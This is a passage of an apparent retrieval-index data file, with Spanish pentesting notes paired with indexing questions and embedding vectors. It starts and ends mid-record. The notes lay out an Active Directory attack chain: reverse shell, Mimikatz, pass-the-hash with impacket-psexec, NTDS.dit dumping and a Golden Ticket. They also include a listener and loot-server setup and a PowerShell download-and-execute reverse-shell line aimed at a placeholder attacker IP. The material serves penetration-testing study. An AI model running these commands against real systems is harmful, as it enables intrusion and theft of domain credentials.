-0.14447, -0.1795, 0.05819, 0.08118, 0.05732, 0.04384, -0.16043, 0.03277, -0.08289, 0.06138, 0.08203, 0.05138, 0.04824, 0.09377, -0.00632, -0.00066, 0.03566, 0.15653, 0.01759, 0.01861, -0.11991, 0.07814, -0.07167, -0.07567, -0.11019, -0.07696, -0.09125, 0.1266, -0.09376, 0.03194, -0.05293, -0.00144, 0.05831, -0.04626, 0.05112, -0.02405, 0.038, -0.03063, 0.02015, 0.07017, 0.00082, 0.04394, 0.12596, -0.08771, -0.08154, 0.08695, -0.05506, 0.0998, 0.08234, -0.07604, -0.014, 0.09626, -0.05715, -0.01667, 0.01432, -0.01054, 0.00663, -0.01479, -0.05214, 0.03377, -0.00161, 0.02433, -0.1185, 0.10007, -0.00389, 0.02925, 0.08558, 0.12379, -0.06644, 0.06248, 0.00757, -0.02209, 0.09452, 0.07553, -0.10513, -0.04754, 0.15704, -0.01886, 0.04199, 0.06782, -0.04218, 0.01319, -0.03329, 0.00458, 0.01161, -0.04405, -0.02894, -0.08027, 0.01904, 0.01647, 0.01295, -0.0564, 0.01242, -0.05999, 0.04963, -0.01546, -0.0907, 0.10095, -0.03143, 0.01425, 0.18202, -0.11773, 0.03487, 0.05123, 0.0195, 0.00208, 0.02368, 0.00215, -0.00382, 0.02439, -0.02988, -0.03355, -0.07448, 0.06799, 0.09103, 0.02562, 0.01649, 0.04383, -0.00177, 0.067, -0.03383, -0.0617, -0.03708, 0.03746, -0.0553, -0.01439, 0.01097, -0.07691, 0.02412, 0.01062, 0.02127, -0.00952, 0.00181, -0.04736, 0.01978, -0.06071, -0.05479, 0.0109, -0.02089, -0.01492, -0.01779, 0.04898, -0.00802, -0.06908, 0.07577, -0.01692, -0.00427, -0.00157, 0.00525, 0.0462, -0.03464, 0.02674, -0.01345, -0.13465, 0.07852, 0.09289, -0.02503, -0.02787, -0.01259, -0.10573, 0.05505, 0.05007, 0.02521, 0.02261, 0.03984, 0.00453, -0.03642, 0.02088, -0.03772, -0.05925, 0.03519, 0.02887, -0.02006, -0.10636, 0.05256, -0.03676, -0.01012, 0.03181, 0.12657, 0.01002, -0.0282, 0.0338, 0.10117, 0.0252, -0.00584, 0.0111, -0.01888, -0.03611, -0.03057, 0.04046, -0.00509, 0.0037, -0.01064, 0.04677, -0.04149, 0.07807, 0.09536, -0.0126, -0.04595, 0.02112, 0.02216, 0.05304, 0.0185, -0.02117, -0.02006, -0.00041, -0.03845, 0.02294, 0.01157, 0.00189, -0.03246, -0.03627, -0.06611, -0.02519, 0.09809, 0.01285, -0.09247, -0.0391, -0.01701, -0.08824, -0.05432, 0.00756, -0.03608, -0.01666, -0.02188, 0.03508, -0.07171, 0.02779, 0.08941]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "```\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ β”‚\n β”‚ 1) RCE inicial en una web ───────► reverse shell PowerShell β”‚\n β”‚ (sqli, file upload, etc.) en mΓ‘quina USUARIO1 β”‚\n β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ β–Ό β”‚\n β”‚ β”‚\n β”‚ 2) WinPEAS desde tu carpeta ──► subes y ejecutas β”‚\n β”‚ enumera permisos, AlwaysInstallElevated, etc. β”‚\n β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ β–Ό β”‚\n β”‚ β”‚\n β”‚ 3) Local privesc ──► SYSTEM en USUARIO1 β”‚\n β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ β–Ό β”‚\n β”‚ β”‚\n β”‚ 4) Mimikatz ──► sekurlsa::logonpasswords β”‚\n β”‚ β†’ hash NTLM de un usuario de dominio (DOMAIN\\juan) β”‚\n β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ β–Ό β”‚\n β”‚ β”‚\n β”‚ 5) BloodHound ──► \"ΒΏjuan es admin en algΓΊn sitio?\" β”‚\n β”‚ \"ΒΏjuan puede llegar a Domain Admin por algΓΊn camino?\" β”‚\n β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ β–Ό β”‚\n β”‚ β”‚\n β”‚ 6) Impacket-psexec con el hash de juan ──► shell en SERVER2 β”‚\n β”‚ impacket-psexec -hashes :HASH 'juan@server2.local' β”‚\n β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ β–Ό β”‚\n β”‚ β”‚\n β”‚ 7) Si server2 = Domain Controller: β”‚\n β”‚ impacket-secretsdump ──► vuelcas TODA la BD del dominio β”‚\n β”‚ (NTDS.dit, krbtgt, etc.) β”‚\n β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ β–Ό β”‚\n β”‚ β”‚\n β”‚ 8) Con hash de krbtgt: β”‚\n β”‚ impacket-ticketer ──► Golden Ticket β†’ eres dios β”‚\n β”‚ β”‚\n β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n```", "indexar": "cuΓ‘l es una alternativa libre a Mimikatz para recuperar contraseΓ±as de inicio de sesiΓ³n?", "v": [0.00048, 0.10416, -0.12238, -0.05455, -0.03911, -0.12061, -0.17429, -0.0943, -0.21073, -0.06805, -0.02153, -0.06635, -0.00467, 0.0366, 0.15706, 0.00194, 0.08202, 0.05113, 0.1461, -0.01851, -0.00219, -0.02374, 0.00936, -0.00269, 0.02892, -0.06839, 0.10354, 0.00835, 0.00186, -0.07603, 0.02671, -0.08537, 0.06433, 0.03953, 0.00455, 0.0389, 0.15072, 0.08788, 0.07584, -0.04906, 0.07377, 0.05668, -0.11936, 0.14525, 0.07065, -0.09131, 0.02679, 0.04067, 0.06664, -0.02444, -0.05394, -0.09101, 0.00475, -0.05254, -0.02826, -0.02967, 0.07632, -0.01647, -0.08224, -0.0438, -0.07781, 0.03008, 0.06583, 0.09367, 0.03981, -0.11257, -0.03266, 0.0453, -0.0746, 0.25746, 0.01548, -0.05702, -0.01511, -0.08545, 0.00396, 0.01021, -0.0123, -0.03586, 0.0277, 0.11994, -0.03617, -0.06769, 0.05948, 0.06319, -0.09889, -0.00123, 0.03041, 0.02179, 0.0217, -0.0216, -0.01063, -0.00953, 0.00454, 0.01889, -0.13401, -0.02327, -0.0722, 0.10259, -0.14893, 0.07447, -0.03806, 0.07286, -0.05856, 0.06737, 0.02366, -0.02933, -0.06981, 0.01196, -0.06766, -0.03936, 0.00522, 0.02628, -0.02899, -0.03679, -0.02909, -0.00887, -0.0773, 0.00349, -0.01034, 0.05484, 0.03676, -0.02826, 0.01477, -0.08569, -0.02341, -0.00128, 0.09477, 0.0196, -0.07283, -0.05401, 0.05544, 0.00341, -0.01272, -0.05638, -0.06703, 0.02816, 0.09931, -0.07313, -0.10327, -0.0172, -0.02229, 0.01759, 0.07706, 0.00594, 0.11685, 0.04113, 0.07088, -0.02265, -0.00631, -0.01961, -0.05847, 0.06073, 0.09819, 0.0541, -0.04757, 0.04791, -0.04755, -0.07521, -0.06635, 0.11101, 0.002, -0.08088, -0.05366, -0.00521, -0.01723, -0.0337, 0.00151, 0.03739, -0.01215, 0.00676, 0.01286, 0.06611, 0.03414, -0.10397, 0.05172, -0.0501, -0.01547, -0.07174, 0.05695, -0.11983, -0.00098, -0.02542, -0.05697, -0.02572, -0.01539, -0.0704, 0.02038, 0.07896, -0.01616, -0.01747, -0.00968, -0.04022, -0.08673, -0.04709, -0.0247, -0.00043, -0.02206, -0.08254, -0.02793, 0.00061, -0.03207, -0.00414, -0.04496, -0.04531, 0.08906, -0.04855, -0.10211, -0.0105, -0.02749, -0.03107, 0.02987, 0.04489, 0.11903, 0.00395, -0.05075, -0.0182, -0.0227, -0.00291, -0.01177, -0.05954, 0.04619, 0.09382, 0.02471, 0.10929, 0.01845, -0.05048, 0.00871, 0.00737, -0.01155, -0.01714, 0.01701, 0.04152, -0.01027, 0.05588, 0.05228, -0.02616, -0.06077, -0.04002, 0.00315, 0.04146, 0.01718, 0.08654, -0.00649, -0.06413, -0.02739, -0.00515, -0.06157, 0.00527, -0.02566, -0.00728, -0.07825, 0.06105, 0.06962, 0.01189, 0.00543, -0.06506]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### A) Levantas tu \"puesto de mando\" en Kali (terminales abiertos)\n\n```\nβ”Œβ”€ Terminal 1 (listener de shells) ─────────────────────────┐\nβ”‚ stty raw -echo; (stty size; cat) | nc -lvnp 4444 β”‚\nβ””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n\nβ”Œβ”€ Terminal 2 (HTTP para servir tus tools a la vΓ­ctima) ────┐\nβ”‚ cd tu carpeta β”‚\nβ”‚ python3 -m http.server 80 β”‚\nβ””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n\nβ”Œβ”€ Terminal 3 (SMB para que la vΓ­ctima TE envΓ­e ficheros) ──┐\nβ”‚ mkdir /tmp/loot && cd /tmp/loot β”‚\nβ”‚ impacket-smbserver loot . -smb2support β”‚\nβ””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n\nβ”Œβ”€ Terminal 4 (tu shell de trabajo: nxc, impacket, etc.) ───┐\nβ”‚ $ β”‚\nβ””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n```", "indexar": "con quΓ© puedo levantar un puesto de mando en Kali con terminales abiertas", "v": [0.02909, 0.14765, -0.18958, 0.0384, -0.07492, 0.00329, 0.02999, 0.03881, -0.18322, -0.05847, -0.18375, -0.0394, 0.02678, -0.04305, 0.06282, 0.16929, 0.02024, -0.06007, 0.11267, -0.04214, -0.08924, -0.02702, -0.04234, -0.09312, 0.10363, 0.0308, 0.08245, -0.13499, -0.12804, -0.11135, 0.02664, 0.02169, -0.00823, -0.07015, 0.08589, -0.02072, -0.08115, 0.10949, -0.01172, -0.02032, -0.03019, 0.01145, -0.05373, -0.04444, 0.04708, -0.03324, 0.08144, -0.03295, 0.12252, 0.05748, -0.00462, -0.09762, -0.01529, -0.05822, -0.00055, -0.03948, 0.16375, 0.06357, 0.05686, -0.10983, -0.02508, 0.02609, 0.05813, 0.12252, 0.06128, -0.03007, 0.01306, 0.11771, -0.08245, 0.03189, -0.07409, 0.06996, -0.03882, 0.09408, 0.03141, 0.08562, -0.16546, 0.00045, 0.10197, 0.06271, -0.05464, -0.07459, -0.06776, 0.02342, -0.08867, -0.16837, -0.02961, 0.02784, -0.07794, -0.01488, 0.12928, 0.04048, -0.07226, 0.05764, 0.05294, 0.01964, -0.05468, 0.08675, -0.06049, 0.06534, 0.12255, 0.02713, 0.01223, 0.06072, -0.02795, 0.00483, -0.00985, -0.10703, 0.07875, -0.02426, -0.03718, -0.08613, 0.07781, 0.01601, -0.12861, 0.00221, -0.05463, -0.05237, -0.08655, -0.0362, 0.02294, -0.07243, 0.08968, -0.02273, 0.03157, -0.00589, -0.05783, 0.06111, 0.10781, 0.04878, 0.07881, 0.03432, 0.0442, -0.00424, 0.02344, -0.01667, 0.07443, -0.03708, 0.06596, -0.03172, 0.01807, 0.06471, 0.01092, -0.10843, 0.03058, 0.02308, -0.04488, 0.0029, -0.05393, -0.05019, 0.01307, 0.01214, -0.00305, 0.07832, -0.02962, 0.07018, 0.0126, -0.02464, -0.04904, 0.10045, -0.05842, -0.0514, -0.10323, 0.00613, -0.0026, 0.00283, -0.10337, -0.01824, 0.03445, -0.05949, -0.04398, 0.00923, 0.01113, 0.01983, -0.01953, -0.08806, -0.02639, -0.01653, 0.03679, -0.05533, -0.0421, 0.05753, -0.01701, -0.05858, -0.04241, 0.01102, -0.01284, -0.05375, 0.05454, 0.04621, 0.01195, 0.0408, -0.01173, -0.00755, 0.06199, -0.01482, 0.03739, -0.01985, -0.05786, 0.00286, -0.06152, 0.0409, -0.00341, -0.01633, 0.06679, -0.00063, -0.06432, 0.09365, 0.02867, 0.08384, -0.04264, 0.00986, 0.03535, 0.02059, -0.06185, -0.00722, -0.05286, 0.02222, -0.03776, 0.04744, 0.02074, -0.01435, 0.04534, -0.0135, -0.01364, 0.08166, 0.01135, -0.00518, 0.02658, 0.01882, -0.0263, 0.0132, -0.01011, -0.01666, 0.02068, 0.04156, 0.00075, -0.0282, -0.00846, -0.02566, 0.00521, 0.0824, 0.01105, -0.05862, -0.03316, -0.07583, -0.02493, 0.02409, -0.01441, -0.06707, -0.04687, 0.06319, 0.01371, -0.05445, -0.01208, -0.0386]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### A) Levantas tu \"puesto de mando\" en Kali (terminales abiertos)\n\n```\nβ”Œβ”€ Terminal 1 (listener de shells) ─────────────────────────┐\nβ”‚ stty raw -echo; (stty size; cat) | nc -lvnp 4444 β”‚\nβ””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n\nβ”Œβ”€ Terminal 2 (HTTP para servir tus tools a la vΓ­ctima) ────┐\nβ”‚ cd tu carpeta β”‚\nβ”‚ python3 -m http.server 80 β”‚\nβ””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n\nβ”Œβ”€ Terminal 3 (SMB para que la vΓ­ctima TE envΓ­e ficheros) ──┐\nβ”‚ mkdir /tmp/loot && cd /tmp/loot β”‚\nβ”‚ impacket-smbserver loot . -smb2support β”‚\nβ””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n\nβ”Œβ”€ Terminal 4 (tu shell de trabajo: nxc, impacket, etc.) ───┐\nβ”‚ $ β”‚\nβ””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n```", "indexar": "quΓ© programa sirve para escuchar shells y servir archivos desde una terminal", "v": [-0.00292, 0.0114, -0.10133, -0.25283, -0.00823, -0.16389, -0.12972, -0.06425, 0.11517, 0.01122, -0.17653, 0.00918, 0.07418, -0.05077, 0.05992, 0.00712, 0.03997, -0.05218, 0.15214, 0.03736, -0.0138, 0.09224, -0.09958, 0.03027, -0.07677, 0.03805, 0.06337, -0.04054, -0.06951, 0.01316, -0.01236, -0.10964, 0.10141, -0.12799, -0.01006, 0.03854, 0.02146, 0.08172, -0.05856, 0.11036, 0.00608, 0.01194, -0.08261, 0.08972, 0.09633, -0.04112, 0.06596, -0.03294, 0.07949, 0.05446, -0.01452, 0.02861, -0.01702, 0.17154, 0.04783, -0.01216, -0.04563, -0.23056, 0.0599, -0.01535, -0.16707, 0.04572, 0.09831, -0.02035, 0.07286, -0.00928, -0.02461, 0.0494, -0.0742, 0.06274, -0.06645, 0.02326, 0.1211, 0.07417, -0.04782, 0.00591, -0.03627, -0.00904, 0.08938, 0.00405, 0.01871, -0.05788, -0.00271, -0.00435, -0.02034, 0.04371, 0.02058, 0.06484, -0.05885, 0.02356, 0.03441, 0.06426, 0.00272, 0.12535, 0.07047, -0.05786, 0.01497, 0.0208, -0.01213, -0.02103, 0.06725, -0.02394, -0.02027, 0.11778, 0.04138, 0.09163, 0.03562, -0.06959, 0.00144, 0.03754, 0.00679, 0.0012, 0.06802, 0.05147, -0.1221, -0.08669, 0.00361, -0.0125, 0.03189, 0.0032, -0.01561, 0.04896, -0.07031, 0.05653, 0.02991, -0.03437, 0.00604, 0.0941, 0.05105, 0.09435, 0.06291, 0.01315, 0.02016, -0.01664, -0.02153, -0.11321, 0.06895, -0.06735, -0.03416, -0.00683, 0.07037, 0.09162, -0.06029, 0.06783, 0.04068, 0.01487, 0.00205, 0.0127, -0.01748, -0.12099, 0.02505, -0.01965, -0.06777, -0.05784, -0.05808, -0.05479, 0.03737, -0.0615, -0.0936, 0.0239, -0.05134, -0.03853, -0.06367, 0.00623, 0.07005, -0.11511, -0.03539, 0.04785, 0.1247, -0.01615, 0.00869, -0.00577, 0.07513, -0.06084, -0.05709, 0.00168, -0.06116, -0.03803, 0.10073, -0.0438, -0.09525, 0.00766, -0.00136, -0.01875, -0.00064, -0.07091, 0.02245, -0.01872, -0.02891, 0.02666, 0.02873, -0.01823, -0.04134, 0.05772, 0.00593, 0.00262, -0.00521, -0.0076, -0.05931, -0.00219, -0.05071, 0.02473, 0.01795, -0.02407, 0.07777, 0.07308, -0.05066, -0.03662, 0.05952, 0.07934, -0.00331, 0.04719, 0.02558, 0.08792, 0.00909, -0.03706, -0.05307, 0.07012, 0.04738, 0.11421, -0.0278, -0.02852, 0.03058, 0.05077, -0.00918, -0.00551, 0.03323, -0.00011, 0.0442, -0.00315, -0.03206, 0.01963, 0.0228, 0.04737, -0.05006, -0.03499, -0.02967, 0.01175, -0.00561, -0.08142, -0.02647, 0.09593, -0.00272, -0.03094, 0.02579, 0.00069, 0.00794, 0.02218, 0.01449, 0.04987, -0.09533, 0.03319, 0.01362, 0.02233, 0.04204, 0.04995]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### A) Levantas tu \"puesto de mando\" en Kali (terminales abiertos)\n\n```\nβ”Œβ”€ Terminal 1 (listener de shells) ─────────────────────────┐\nβ”‚ stty raw -echo; (stty size; cat) | nc -lvnp 4444 β”‚\nβ””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n\nβ”Œβ”€ Terminal 2 (HTTP para servir tus tools a la vΓ­ctima) ────┐\nβ”‚ cd tu carpeta β”‚\nβ”‚ python3 -m http.server 80 β”‚\nβ””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n\nβ”Œβ”€ Terminal 3 (SMB para que la vΓ­ctima TE envΓ­e ficheros) ──┐\nβ”‚ mkdir /tmp/loot && cd /tmp/loot β”‚\nβ”‚ impacket-smbserver loot . -smb2support β”‚\nβ””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n\nβ”Œβ”€ Terminal 4 (tu shell de trabajo: nxc, impacket, etc.) ───┐\nβ”‚ $ β”‚\nβ””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n```", "indexar": "cΓ³mo montar un servidor SMB simple usando impacket", "v": [-0.07154, -0.02549, -0.25215, -0.14766, -0.22451, -0.15554, -0.06684, -0.10773, -0.06676, -0.05806, -0.19796, 0.07168, 0.15225, -0.09695, 0.00384, 0.13067, 0.08919, -0.15432, 0.00336, 0.02366, 0.06878, 0.05055, 0.04874, -0.06019, -0.01701, 0.1076, 0.05761, -0.00419, -0.08338, 0.00923, -0.01205, 0.03154, 0.05154, 0.02385, -0.03453, -0.19034, -0.00694, -0.02091, -0.02873, 0.00905, 0.04298, -0.04207, -0.07005, 0.03466, -0.04973, 0.02548, 0.08399, -0.07985, 0.02237, -0.00869, 0.02496, -0.01638, -0.13324, 0.01537, -0.1027, 0.04259, 0.10978, -0.12381, 0.0872, 0.02036, -0.08371, 0.12438, 0.00672, 0.07881, 0.14841, -0.05129, -0.06564, -0.00584, -0.11313, -0.10797, -0.04, -0.02007, 0.02389, -0.04461, 0.04418, 0.12207, 0.02619, 0.00404, 0.07619, 0.1048, 0.01623, -0.04882, -0.01979, 0.12407, -0.0974, -0.03723, 0.03886, -0.00057, 0.06207, 0.00366, 0.03618, 0.07669, -0.02204, 0.06641, 0.02356, -0.09611, 0.10209, 0.03718, 0.05232, -0.00186, 0.02477, 0.04386, -0.04363, 0.09073, 0.00144, 0.03966, 0.10305, -0.07664, 0.00776, -0.03331, 0.09016, 0.02798, -0.0419, 0.05076, -0.06738, -0.14932, 0.06943, 0.00059, 0.0057, 0.00505, -0.05204, 0.04348, 0.04798, 0.01714, 0.00231, -0.0704, 0.14749, 0.03187, -0.03005, -0.05469, -0.02141, -0.03949, -0.04145, 0.02549, 0.01494, -0.00743, 0.03018, -0.06589, -0.1139, -0.03108, 0.02703, -0.02258, -0.07268, 0.00479, 0.03232, 0.01273, 0.09825, -0.08716, -0.0567, 0.06709, 0.12788, 0.02342, -0.07788, -0.00503, -0.06486, -0.05709, 0.01319, -0.08946, -0.04039, 0.05408, 0.01775, 0.02437, 0.02908, 0.10114, 0.04299, -0.03053, 0.00571, 0.03188, 0.05333, 0.02223, -0.01486, 0.03009, 0.04151, -0.01339, 0.03762, -0.02157, -0.06768, -0.00736, 0.02492, 0.01669, -0.00486, 0.01357, 0.00294, 0.04698, -0.05905, -0.04864, 0.05478, 0.01615, -0.0262, -0.00592, 0.01771, 0.04505, -0.01256, 0.03103, 0.04983, -0.0474, -0.01403, -0.03251, 0.00397, 0.01343, -0.01555, -0.0427, -0.04053, -0.07292, -0.01909, -0.04262, -0.06211, 0.05151, 0.03682, 0.04075, 0.01583, -0.01429, 0.04203, -0.05108, 0.00627, 0.01898, 0.0209, -0.01179, -0.01335, -0.01597, -0.02326, 0.02183, 0.00581, 0.00693, -0.00654, 0.03437, -0.0161, 0.00852, 0.03982, 0.00797, -0.02024, 0.05565, -0.0392, 0.01778, 0.02233, -0.01223, 0.00929, 0.00646, -0.02022, -0.01585, 0.00721, 0.03194, -0.01886, -0.01822, -0.01455, -0.03458, -0.00884, 0.01381, -0.03838, -0.01231, 0.02945, -0.06685, -0.01834, -0.02482, -0.05633, -0.00879]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### B) Recibes una reverse shell\n\nTienes RCE en la vΓ­ctima (por ejemplo SQLi β†’ xp_cmdshell, o file upload). Le metes:\n\n```powershell\nIEX(IWR http://TU_IP/Invoke-ConPtyShell/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell TU_IP 4444\n```\n\nTu Terminal 1 te da una shell **interactiva** Windows.", "indexar": "que programa puedo usar para obtener una reverse shell interactiva en Windows desde PowerShell?", "v": [0.01846, 0.0334, -0.07608, -0.11513, -0.00135, -0.05709, -0.12975, -0.13673, 0.01569, -0.07586, -0.15184, -0.05517, -0.05531, -0.10937, -0.05765, 0.05752, -0.07445, -0.09922, -0.00511, 0.03517, -0.01067, 0.0064, -0.1864, -0.10925, -0.04592, 0.14418, -0.00402, 0.05445, -0.0645, -0.07352, -0.04405, -0.10876, 0.0361, -0.08665, -0.08922, 0.03186, -0.03198, 0.07375, 0.18075, 0.08988, 0.00233, 0.10023, -0.07632, 0.12943, 0.13851, 0.03061, 0.07014, -0.11791, 0.0005, -0.00523, -0.11492, -0.04684, -0.14995, -0.00209, 0.11339, -0.16282, 0.07218, -0.15828, -0.10236, -0.04667, -0.04303, 0.10961, -0.06035, 0.04871, 0.02741, -0.02204, -0.01316, -0.11146, -0.08983, 0.1318, -0.08154, 0.02062, 0.08576, -0.01131, -0.00081, 0.03614, 0.02733, -0.07025, 0.06222, -0.04077, -0.09879, 0.02256, 0.0479, 0.03468, -0.0477, -0.07421, 0.02411, -0.12931, 0.00225, -0.09004, 0.05328, 0.03313, -0.02753, 0.10195, 0.02685, -0.12335, -0.00732, 0.04476, -0.01626, 0.03998, -0.01197, -0.10976, -0.03906, 0.10953, 0.03037, 0.03955, 0.00089, -0.01318, -0.08626, 0.06319, -0.01149, -0.02119, -0.00043, 0.00483, -0.06705, 0.0615, -0.04246, -0.11005, 0.02838, -0.02733, -0.06492, 0.0421, -0.05762, 0.01462, 0.0916, 0.01324, -0.0265, 0.09147, -0.06516, 0.0426, 0.03183, -0.04281, 0.01265, -0.07522, -0.08918, -0.01784, 0.01794, -0.00192, 0.01913, -0.07393, 0.07059, 0.12168, 0.01708, -0.02635, -0.03581, -0.05692, 0.04349, 0.0136, -0.0215, 0.04103, 0.03314, -0.00122, -0.00321, 0.03654, -0.04703, -0.02476, 0.06743, 0.0455, -0.06378, -0.04234, -0.10422, -0.02442, -0.00446, 0.01124, 0.04814, -0.06218, -0.12135, 0.00279, 0.04193, 0.00471, -0.02508, 0.12356, 0.05953, -0.01041, 0.01966, 0.02907, 0.02895, 0.00029, -0.03327, -0.05983, -0.0482, 0.02149, 0.01322, -0.05624, -0.05231, 0.04405, -0.01332, 0.05504, -0.04433, -0.00921, -0.06072, 0.02606, 0.06358, -0.05691, 0.03561, 0.02056, 0.02286, -0.00395, 0.04938, -0.0252, -0.06118, 0.02904, -0.02433, -0.01842, 0.07675, 0.0576, -0.03688, 0.01432, 0.0709, 0.03251, 0.03406, 0.0053, 0.07426, 0.07669, -0.00529, -0.07048, 0.01144, 0.0041, -0.00109, 0.07568, -0.01544, 0.014, -0.00081, 0.06057, 0.01605, -0.07727, -0.01866, -0.00287, -0.01239, 0.03378, 0.00747, 0.02252, 0.02972, 0.01431, -0.00895, -0.02608, -0.02291, -0.01352, -3e-05, -0.02752, -0.06845, 0.10546, 0.01083, -0.03415, -0.03128, -0.01664, -0.03792, -0.00445, -0.01186, -0.03074, -0.01993, 0.00303, 0.04358, -0.03943, -0.03311, 0.02161]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### B) Recibes una reverse shell\n\nTienes RCE en la vΓ­ctima (por ejemplo SQLi β†’ xp_cmdshell, o file upload). Le metes:\n\n```powershell\nIEX(IWR http://TU_IP/Invoke-ConPtyShell/Invoke-ConPtyShell.ps1 -UseBasicParsing); 